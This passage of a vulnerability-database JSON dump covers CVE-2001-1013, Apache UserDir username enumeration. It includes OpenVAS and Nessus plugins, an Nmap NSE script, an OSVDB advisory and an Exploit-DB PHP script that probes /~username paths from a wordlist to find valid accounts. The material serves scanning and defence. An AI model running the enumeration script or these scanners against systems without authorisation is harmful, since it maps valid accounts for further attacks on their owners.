"http://plugins.openvas.org/nasl.php?oid=104150", "type": "openvas", "title": "Nmap NSE net: http-vmware-path-vuln", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nmap_http_vmware_path_vuln_net.nasl 5505 2017-03-07 10:00:18Z teissa $\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: Ron Bowes\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).\n\nThe vulnerability was originally released by Justin Morehouse and Tony Flick, who presented at\nShmoocon 2010 (http://fyrmassociates.com/tools.html).\n\n\nSYNTAX:\n\nhttp.pipeline: If set, it represents the number of HTTP requests that'll be\npipelined (ie, sent in a single request). This can be set low to make\ndebugging easier, or it can be set high to test how a server reacts (its\nchosen max is ignored).\n\n\nhttp.useragent: The value of the User-Agent header field sent with\nrequests. By default it is\n''Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)''.\nA value of the empty string disables sending the User-Agent header field.\n\n\n\nhttp-max-cache-size: The maximum memory size (in bytes) of the cache.\";\n\nif(description)\n{\n script_id(104150);\n script_version(\"$Revision: 5505 $\");\n script_cve_id(\"CVE-2001-1013\");\n script_bugtraq_id(3335);\n script_tag(name:\"last_modification\", value:\"$Date: 2017-03-07 11:00:18 +0100 (Tue, 07 Mar 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Nmap NSE net: http-vmware-path-vuln\");\n\n\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n script_dependencies(\"nmap_nse_net.nasl\");\n script_mandatory_keys(\"Tools/Launch/nmap_nse_net\");\n\n script_add_preference(name:\"http.pipeline\", value:\"\", type:\"entry\");\n script_add_preference(name:\"http.useragent\", value:\"\", type:\"entry\");\n script_add_preference(name:\"http-max-cache-size\", value:\"\", type:\"entry\");\n\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"nmap.inc\");\n\n\nphase = 0;\nif (defined_func(\"scan_phase\")) {\n phase = scan_phase();\n}\n\nif (phase == 1) {\n # Get the preferences\n argv = make_array();\n\n pref = script_get_preference(\"http.pipeline\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"http.pipeline\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"http.useragent\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"http.useragent\"] = string('\"', pref, '\"');\n }\n pref = script_get_preference(\"http-max-cache-size\");\n if (!isnull(pref) && pref != \"\") {\n argv[\"http-max-cache-size\"] = string('\"', pref, '\"');\n }\n nmap_nse_register(script:\"http-vmware-path-vuln\", args:argv);\n} else if (phase == 2) {\n res = nmap_nse_get_results(script:\"http-vmware-path-vuln\");\n foreach portspec (keys(res)) {\n output_banner = 'Result found by Nmap Security Scanner (http-vmware-path-vuln.nse) http://nmap.org:\\n\\n';\n if (portspec == \"0\") {\n security_message(data:output_banner + res[portspec], port:0);\n } else {\n v = split(portspec, sep:\"/\", keep:0);\n proto = v[0];\n port = v[1];\n security_message(data:output_banner + res[portspec], port:port, protocol:proto);\n }\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-07-21T19:26:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1013", "CVE-2009-3733"], "description": "Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).\n\nThe vulnerability was originally released by Justin Morehouse and Tony Flick, who presented at\nShmoocon 2010 (see reference).\n\nSYNTAX:\n\nhttp.pipeline: If set, it represents the number of HTTP requests that", "modified": "2020-07-07T00:00:00", "published": "2011-06-01T00:00:00", "id": "OPENVAS:1361412562310104150", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310104150", "type": "openvas", "title": "Nmap NSE net: http-vmware-path-vuln", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: Ron Bowes\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.104150\");\n script_version(\"2020-07-07T14:13:50+0000\");\n script_cve_id(\"CVE-2001-1013\");\n script_bugtraq_id(3335);\n script_tag(name:\"last_modification\", value:\"2020-07-07 14:13:50 +0000 (Tue, 07 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-06-01 16:32:46 +0200 (Wed, 01 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Nmap NSE net: http-vmware-path-vuln\");\n script_category(ACT_INIT);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2011 NSE-Script: The Nmap Security Scanner; NASL-Wrapper: Greenbone Networks GmbH\");\n script_family(\"Nmap NSE net\");\n\n script_xref(name:\"URL\", value:\"http://fyrmassociates.com/tools.html\");\n\n script_tag(name:\"summary\", value:\"Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).\n\nThe vulnerability was originally released by Justin Morehouse and Tony Flick, who presented at\nShmoocon 2010 (see reference).\n\nSYNTAX:\n\nhttp.pipeline: If set, it represents the number of HTTP requests that'll be\npipelined (ie, sent in a single request). This can be set low to make\ndebugging easier, or it can be set high to test how a server reacts (its\nchosen max is ignored).\n\nhttp-max-cache-size: The maximum memory size (in bytes) of the cache.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-02T15:42:00", "description": "Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability. CVE-2001-1013. Remote exploit for linux platform", "published": "2001-09-12T00:00:00", "type": "exploitdb", "title": "Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-1013"], "modified": "2001-09-12T00:00:00", "id": "EDB-ID:21112", "href": "https://www.exploit-db.com/exploits/21112/", "sourceData": "source: http://www.securityfocus.com/bid/3335/info\r\n\r\nVersions of Apache webserver shipping with Red Hat Linux 7.0 (and possibly other Apache distributions) install with a default misconfiguration which could allow remote users to determine whether a give username exists on the vulnerable system.\r\n\r\nhttp://www.example.com/~<username>\r\n\r\nWhen a remote user makes a request for a possible user's default home page, the server returns one of three responses:\r\n\r\nIn a case where <username> is a valid user account, and has been configured with a homepage, the server responds with the user's homepage.\r\n\r\nWhen <username> exists on the system, but has not been assigned a homepage document, the server returns the message \"You don't have permission to access /~username on this server.\"\r\n\r\nHowever, if the tested username does not exist as an account on the system, the Apache server's response includes the message \"The requested URL /~username was not found on this server.\"\r\n\r\nBecause the server responds differently in the latter two cases, a remote user can test and enumerate possible usernames. Properly exploited, this information could be used in further attacks on the vulnerable hos\r\n\r\n#!/usr/local/bin/php -q\r\n<?\r\n/*\r\ndefault misconfiguration which could allow remote users\r\nto determine whether a give username exists on the vulnerable system.\r\n\r\n By Gabriel A Maggiotti\r\n */\r\n\r\n\r\n if( $argc!=4)\r\n {\r\n echo \"usagge: $argv[0] <host> <userlist> <delay>\\n\";\r\n return 1;\r\n }\r\n\r\n\r\n$host=$argv[1];\r\n$userlist=$argv[2];\r\n\r\n\r\n$fd = fopen ($userlist, \"r\");\r\nwhile (!feof ($fd)) {\r\n $user = fgets($fd, 4096);\r\n \r\n $fp = fsockopen ($host, 80 , &$errno, &$errstr, 30);\r\n fputs ($fp, \"GET /~$user HTTP/1.0\\r\\n\\r\\n\");\r\n while (!feof ($fp)) {\r\n $sniff=fgets($fp,1024);\r\n if(strpos($sniff,\"permission\")!=\"\") {\r\n echo \"$user exists!!!\\n\";\r\n break;\r\n }\r\n }\r\n fclose ($fp);\r\n sleep(3);\r\n}\r\n\r\nfclose ($fd);\r\n\r\n?>\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/21112/"}], "nmap": [{"lastseen": "2019-05-30T17:06:01", "description": "Attempts to enumerate valid usernames on web servers running with the mod_userdir module or similar enabled. \n\nThe Apache mod_userdir module allows user-specific directories to be accessed using the http://example.com/~user/ syntax. This script makes http requests in order to discover valid user-specific directories and infer valid usernames. By default, the script will use Nmap's `nselib/data/usernames.lst`. An HTTP response status of 200 or 403 means the username is likely a valid one and the username will be output in the script results along with the status code (in parentheses). \n\nThis script makes an attempt to avoid false positives by requesting a directory which is unlikely to exist. If the server responds with 200 or 403 then the script will not continue testing it. \n\nCVE-2001-1013: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1013.\n\n## Script Arguments \n\n#### http-userdir-enum.limit \n\nThe maximum number of users to check.\n\n#### http-userdir-enum.users \n\nThe filename of a username list.\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n## Example Usage \n \n \n nmap -sV --script=http-userdir-enum <target>\n\n## Script Output \n \n \n 80/tcp open http syn-ack Apache httpd 2.2.9\n |_ http-userdir-enum: Potential Users: root (403), user (200), test (200)\n\n## Requires \n\n * datafiles\n * http\n * nmap\n * shortport\n * stdnse\n * string\n * table\n\n* * *\n", "edition": 7, "published": "2009-08-22T22:04:32", "title": "http-userdir-enum NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1013"], "modified": "2017-03-24T22:05:51", "id": "NMAP:HTTP-USERDIR-ENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/http-userdir-enum.html", "sourceData": "local datafiles = require \"datafiles\"\nlocal http = require \"http\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nAttempts to enumerate valid usernames on web servers running with the mod_userdir\nmodule or similar enabled.\n\nThe Apache mod_userdir module allows user-specific directories to be accessed\nusing the http://example.com/~user/ syntax. This script makes http requests in\norder to discover valid user-specific directories and infer valid usernames. By\ndefault, the script will use Nmap's\n<code>nselib/data/usernames.lst</code>. An HTTP response\nstatus of 200 or 403 means the username is likely a valid one and the username\nwill be output in the script results along with the status code (in parentheses).\n\nThis script makes an attempt to avoid false positives by requesting a directory\nwhich is unlikely to exist. If the server responds with 200 or 403 then the\nscript will not continue testing it.\n\nCVE-2001-1013: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1013.\n]]\n\n---\n-- @args http-userdir-enum.users The filename of a username list.\n-- @args http-userdir-enum.limit The maximum number of users to check.\n--\n-- @output\n-- 80/tcp open http syn-ack Apache httpd 2.2.9\n-- |_ http-userdir-enum: Potential Users: root (403), user (200), test (200)\n\nauthor = \"jah\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"auth\", \"intrusive\"}\n\n\n\nportrule = shortport.http\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n local limit = stdnse.get_script_args(SCRIPT_NAME .. '.limit')\n\n if(not nmap.registry.userdir) then\n init()\n end\n local usernames = nmap.registry.userdir\n\n -- speedy exit if no usernames\n if(#usernames == 0) then\n return fail(\"Didn't find any users to test (should be in nselib/data/usernames.lst)\")\n end\n\n -- Identify servers that answer 200 to invalid HTTP requests and exit as these would invalidate the tests\n local status_404, result_404, known_404 = http.identify_404(host,port)\n if ( status_404 and result_404 == 200 ) then\n stdnse.debug1(\"Exiting due to ambiguous response from web server on %s:%s. All URIs return status 200.\", host.ip, port.number)\n return nil\n end\n\n -- Check if we can use HEAD requests\n local use_head = http.can_use_head(host, port, result_404)\n\n -- Queue up the checks\n local all = {}\n local i\n for i = 1, #usernames, 1 do\n if(nmap.registry.args.limit and i > tonumber(nmap.registry.args.limit)) then\n stdnse.debug1(\"Reached the limit (%d), stopping\", nmap.registry.args.limit)\n break;\n end\n\n if(use_head) then\n all = http.pipeline_add(\"/~\" .. usernames[i], nil, all, 'HEAD')\n else\n all = http.pipeline_add(\"/~\" .. usernames[i], nil, all, 'GET')\n end\n end\n\n local results = http.pipeline_go(host, port, all)\n\n -- Check for http.pipeline error\n if(results == nil) then\n stdnse.debug1(\"http.pipeline returned nil\")\n return fail(\"http.pipeline returned nil\")\n end\n\n local found = {}\n for i, data in pairs(results) do\n if(http.page_exists(data, result_404, known_404, \"/~\" .. usernames[i], true)) then\n stdnse.debug1(\"Found a valid user: %s\", usernames[i])\n table.insert(found, usernames[i])\n end\n end\n\n if(#found > 0) then\n return string.format(\"Potential Users: %s\", table.concat(found, \", \"))\n elseif(nmap.debugging() > 0) then\n return \"Didn't find any users!\"\n end\n\n return nil\nend\n\n\n\n---\n-- Parses a file containing usernames (1 per line), defaulting to\n-- \"nselib/data/usernames.lst\" and stores the resulting array of usernames in\n-- the registry for use by all threads of this script. This means file access\n-- is done only once per Nmap invocation. init() also adds a random string to\n-- the array (in the first position) to attempt to catch false positives.\n-- @return nil\n\nfunction init()\n local customlist = stdnse.get_script_args(SCRIPT_NAME .. '.users')\n local read, usernames = datafiles.parse_file(customlist or \"nselib/data/usernames.lst\", {})\n if not read then\n stdnse.debug1(\"%s\", usernames or \"Unknown Error reading usernames list.\")\n nmap.registry.userdir = {}\n return nil\n end\n -- random dummy username to catch false positives (not necessary)\n-- if #usernames > 0 then table.insert(usernames, 1, randomstring()) end\n nmap.registry.userdir = usernames\n stdnse.debug1(\"Testing %d usernames.\", #usernames)\n return nil\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-03-01T01:24:18", "description": "When configured with the 'UserDir' option, requests to URLs containing\na tilde followed by a username will redirect the user to a given\nsubdirectory in the user home.\n\nFor instance, by default, requesting /~root/ displays the HTML\ncontents from /root/public_html/.\n\nIf the username requested does not exist, then Apache will reply with\na different error code. Therefore, an attacker may exploit this\nvulnerability to guess the presence of a given user name on the remote\nhost.", "edition": 29, "cvss3": {"score": 5.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}, "published": "2001-09-18T00:00:00", "title": "Apache UserDir Directive Username Enumeration", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1013"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_USERNAME.NASL", "href": "https://www.tenable.com/plugins/nessus/10766", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(10766);\n script_version(\"1.42\");\n script_cvs_date(\"Date: 2018/06/29 12:01:03\");\n\n script_cve_id(\"CVE-2001-1013\");\n script_bugtraq_id(3335);\n\n script_name(english:\"Apache UserDir Directive Username Enumeration\");\n script_summary(english:\"Checks for the error codes returned by Apache when requesting a nonexistent user name\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache server can be used to guess the presence of a given\nuser name on the remote host.\");\n script_set_attribute(attribute:\"description\", value:\n\"When configured with the 'UserDir' option, requests to URLs containing\na tilde followed by a username will redirect the user to a given\nsubdirectory in the user home.\n\nFor instance, by default, requesting /~root/ displays the HTML\ncontents from /root/public_html/.\n\nIf the username requested does not exist, then Apache will reply with\na different error code. Therefore, an attacker may exploit this\nvulnerability to guess the presence of a given user name on the remote\nhost.\");\n script_set_attribute(attribute:\"solution\", value:\"In httpd.conf, set the 'UserDir' to 'disabled'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2001/09/18\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.\");\n\n script_dependencie(\"apache_http_version.nasl\");\n script_require_keys(\"installed_sw/Apache\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nget_install_count(app_name:\"Apache\", exit_if_zero:TRUE);\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:\"Apache\", port:port);\n\nr = http_send_recv3(method:\"GET\",item:\"/~root\", port:port);\nif (isnull(r)) exit(0);\ncode = ereg_replace(pattern:\"^HTTP/[0-9.]+ ([0-9]+) .*\", string: r[0], replace:\"\\1\");\nif ( ! code ) exit(0);\n\nr = http_send_recv3(method:\"GET\", item:\"/~admin\", port:port);\nif (isnull(r)) exit(0);\ncode2 = ereg_replace(pattern:\"^HTTP/[0-9.]+ ([0-9]+) .*\", string: r[0], replace:\"\\1\");\nif ( ! code2 ) exit(0);\n\nr = http_send_recv3(method:\"GET\", item:\"/~\" + rand_str(length:8), port:port);\nif (isnull(r)) exit(0);\ncode3 = ereg_replace(pattern:\"^HTTP/[0-9.]+ ([0-9]+) .*\", string: r[0], replace:\"\\1\");\nif ( ! code3 ) exit(0);\n\n\nif ( code != code3 || code2 != code3 ) security_warning(port);\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Apache\", port, install[\"version\"]);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-2001-1013"], "edition": 1, "description": "## Vulnerability Description\nApache web servers contain a flaw that may lead to an unauthorized information disclosure. The issue is triggered when the UserDir module is enabled and a remote attacker requests access to a user's home directory. By monitoring the web server response, an attacker is able to enumerate valid user names, resulting in a loss of confidentiality.\n## Solution Description\nCurrently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): \n\nWorkaround 1: Disable the default-enabled UserDir directive in httpd.conf:\nUserDir Disabled\n\nWorkaround 2: Set generic error pages for 403/404 messages in httpd.conf.\n## Short Description\nApache web servers contain a flaw that may lead to an unauthorized information disclosure. The issue is triggered when the UserDir module is enabled and a remote attacker requests access to a user's home directory. By monitoring the web server response, an attacker is able to enumerate valid user names, resulting in a loss of confidentiality.\n## Manual Testing Notes\nhttp://[victim]/~<username>\n\nHTTP result code 200 - User root exists and you should be able to view root's homepage. \n\nHTTP result code 403 - You receive the following error message, \"You don't have permission to access /~root on this server\" because Apache cannot read root's directory or files. \n\nHTTP result code 404 - You receive the following error message, \"The requested URL /~nosuchuser was not found on this server.\" because \"nosuchuser\" does not exist on the system.\n## References:\nVendor URL: http://httpd.apache.org/\nOther Advisory URL: http://www.securiteam.com/unixfocus/5WP0C1F5FI.html\n[Nessus Plugin ID:10766](https://vulners.com/search?query=pluginID:10766)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2001-09/0103.html\nMail List Post: http://marc.theaimsgroup.com/?l=vuln-dev&m=96297636413302&w=2\nMail List Post: http://marc.theaimsgroup.com/?l=vuln-dev&m=96297697414539&w=2\nISS X-Force ID: 7129\nGeneric Exploit URL: http://packetstormsecurity.org/0407-exploits/getusr.c\n[CVE-2001-1013](https://vulners.com/cve/CVE-2001-1013)\nBugtraq ID: 3335\n", "modified": "2000-07-07T00:00:00", "published": "2000-07-07T00:00:00", "id": "OSVDB:637", "href": "https://vulners.com/osvdb/OSVDB:637", "title": "Apache HTTP Server UserDir Directive Username Enumeration", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}
